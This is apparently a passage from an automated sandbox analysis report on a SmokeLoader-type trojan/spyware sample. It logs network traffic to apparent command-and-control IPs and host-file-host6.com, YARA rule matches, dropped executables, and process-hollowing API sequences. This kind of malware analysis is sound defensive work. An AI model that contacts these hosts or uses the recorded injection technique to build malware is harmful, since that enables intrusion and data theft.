                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.87.154.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.87.154.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.87.154.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.87.154.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.87.154.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.87.154.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: +l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                      Source: E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovnfahllse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: host-file-host6.com
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.7:49802 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 00000003.00000002.341140573.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416663548.0000000002410000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.341021768.0000000000540000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.320895536.0000000002F91000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.430943063.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416737725.0000000002431000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.431087130.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: X5lLjSzDd8.exe, 00000000.00000002.269775455.00000000022EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: E8E7.exe.6.dr, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 19.2.E8E7.exe.750000.0.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 19.0.E8E7.exe.750000.3.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 19.0.E8E7.exe.750000.2.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 19.0.E8E7.exe.750000.0.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 19.0.E8E7.exe.750000.1.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 24.2.E8E7.exe.110000.0.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 24.0.E8E7.exe.110000.0.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 24.0.E8E7.exe.110000.3.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 24.0.E8E7.exe.110000.2.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      Source: 24.0.E8E7.exe.110000.1.unpack, Faints.Managers/AuthenticationWrapperManager.csLarge array initialization: DestroyAlgo: array initializer size 189774
                      PE file contains section with special charsShow sources
                      Source: DA6F.exe.6.drStatic PE information: section name:
                      Source: DA6F.exe.6.drStatic PE information: section name:
                      Source: FB48.exe.6.drStatic PE information: section name: I!&%+
                      Source: 2D0D.exe.6.drStatic PE information: section name:
                      Source: 2D0D.exe.6.drStatic PE information: section name:
                      PE file has nameless sectionsShow sources
                      Source: FB48.exe.6.drStatic PE information: section name:
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_00EDE1D0
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_00EDB950
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_00EDE9E9
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_00EDE9F8
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_05070978
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_05072AF0
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_0510A7D8
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_0510BE70
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_05109048
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_0510CB10
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_051083D0
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_0510D278
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_0510DED8
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeCode function: 27_2_03C7F0A8
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 28_2_00D4EC68
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                      Source: C:\Windows\explorer.exeSection loaded: webio.dll
                      Source: X5lLjSzDd8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 19.2.E8E7.exe.3d83490.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                      Source: 00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                      Source: 00000013.00000002.478488816.0000000003D03000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                      Source: Process Memory Space: E8E7.exe PID: 6908, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_02100110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_2_0040180C Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_2_00401818 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_2_00401822 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_2_00401826 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_2_00401834 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 15_2_020F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 18_2_0040180C Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 18_2_00401818 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 18_2_00401822 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 18_2_00401826 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 18_2_00401834 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_05075368 NtAllocateVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_050752B0 NtUnmapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_05075362 NtAllocateVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_050752A8 NtUnmapViewOfSection,
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 20_2_0040180C Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 20_2_00401818 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 20_2_00401822 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 20_2_00401826 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 20_2_00401834 Sleep,NtTerminateProcess,
                      Source: DA6F.exe.6.drStatic PE information: Section: ZLIB complexity 0.998759064227
                      Source: FB48.exe.6.drStatic PE information: Section: I!&%+ ZLIB complexity 1.00047459112
                      Source: 2D0D.exe.6.drStatic PE information: Section: ZLIB complexity 0.997735662775
                      Source: X5lLjSzDd8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rfudbriJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/9@53/8
                      Source: X5lLjSzDd8.exeVirustotal: Detection: 45%
                      Source: X5lLjSzDd8.exeReversingLabs: Detection: 51%
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\X5lLjSzDd8.exe "C:\Users\user\Desktop\X5lLjSzDd8.exe"
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeProcess created: C:\Users\user\Desktop\X5lLjSzDd8.exe "C:\Users\user\Desktop\X5lLjSzDd8.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\rfudbri C:\Users\user\AppData\Roaming\rfudbri
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BEE7.exe C:\Users\user~1\AppData\Local\Temp\BEE7.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DA6F.exe C:\Users\user~1\AppData\Local\Temp\DA6F.exe
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess created: C:\Users\user\AppData\Local\Temp\BEE7.exe C:\Users\user~1\AppData\Local\Temp\BEE7.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E8E7.exe C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                      Source: C:\Users\user\AppData\Roaming\rfudbriProcess created: C:\Users\user\AppData\Roaming\rfudbri C:\Users\user\AppData\Roaming\rfudbri
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FB48.exe C:\Users\user~1\AppData\Local\Temp\FB48.exe
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess created: C:\Users\user\AppData\Local\Temp\E8E7.exe C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2D0D.exe C:\Users\user~1\AppData\Local\Temp\2D0D.exe
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess created: C:\Users\user\AppData\Local\Temp\E8E7.exe C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeProcess created: C:\Users\user\Desktop\X5lLjSzDd8.exe "C:\Users\user\Desktop\X5lLjSzDd8.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BEE7.exe C:\Users\user~1\AppData\Local\Temp\BEE7.exe
